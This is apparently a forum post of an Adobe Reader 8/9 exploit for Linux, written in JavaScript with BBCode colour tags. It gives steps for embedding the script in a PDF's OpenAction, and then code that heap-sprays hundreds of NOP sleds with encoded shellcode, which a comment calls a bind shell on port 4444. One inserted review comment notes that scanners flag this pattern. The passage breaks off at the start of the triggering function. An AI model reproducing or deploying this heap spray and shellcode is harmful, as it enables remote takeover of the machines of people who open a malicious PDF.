[COLOR=#000000][COLOR=#FF8000]//##############
//Exploit made by Arr1val
//Tested on Adobe 9.1 and Adobe 8.1.4 on Linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.
//##############
// Script-global array that New_Script() fills with identical nop+shellcode strings
// (the for loop over 0x6ff entries below); kept outside the function so the buffers
// stay referenced when start() runs. NOTE(review): a multi-hundred-KB unescape'd NOP
// string copied into hundreds of array slots is the heap-spray shape that static
// PDF/JavaScript scanners and Reader's JS-blocking policies typically flag.
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700];
function [/COLOR][COLOR=#0000BB]New_Script[/COLOR][COLOR=#007700]()
{
[/COLOR][COLOR=#FF8000]//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]startwith [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]app[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]alert[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Hi'[/COLOR][COLOR=#007700]);[/COLOR][COLOR=#FF8000]//required for adobe9
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]nop [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]unescape[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"%u9090%u9090"[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#FF8000]//long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
[/COLOR][COLOR=#007700]var [/COLOR][COLOR=#0000BB]shellcode [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]unescape[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#DD0000]"%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#FF8000]//linux bind shell at port 4444
[/COLOR][COLOR=#007700]while([/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]length [/COLOR][COLOR=#007700]<= [/COLOR][COLOR=#0000BB]0x100000[/COLOR][COLOR=#007700]/[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]) [/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700]+=[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]nop[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]substring[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]0x100000[/COLOR][COLOR=#007700]/[/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]- [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]length[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700]=new Array();
for([/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]<[/COLOR][COLOR=#0000BB]0x6ff[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]++) [/COLOR][COLOR=#FF8000]//we should at least overwrite 0x90909090
[/COLOR][COLOR=#007700]{[/COLOR][COLOR=#0000BB]memory[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]i[/COLOR][COLOR=#007700]]=[/COLOR][COLOR=#0000BB]nop [/COLOR][COLOR=#007700]+ [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700];}
[/COLOR][COLOR=#FF8000]//start exploit now
[/COLOR][COLOR=#0000BB]start[/COLOR][COLOR=#007700]();
function [/COLOR][COLOR=#0000BB]start[/COLOR][COLOR=#007700]()[/COLOR][/COLOR]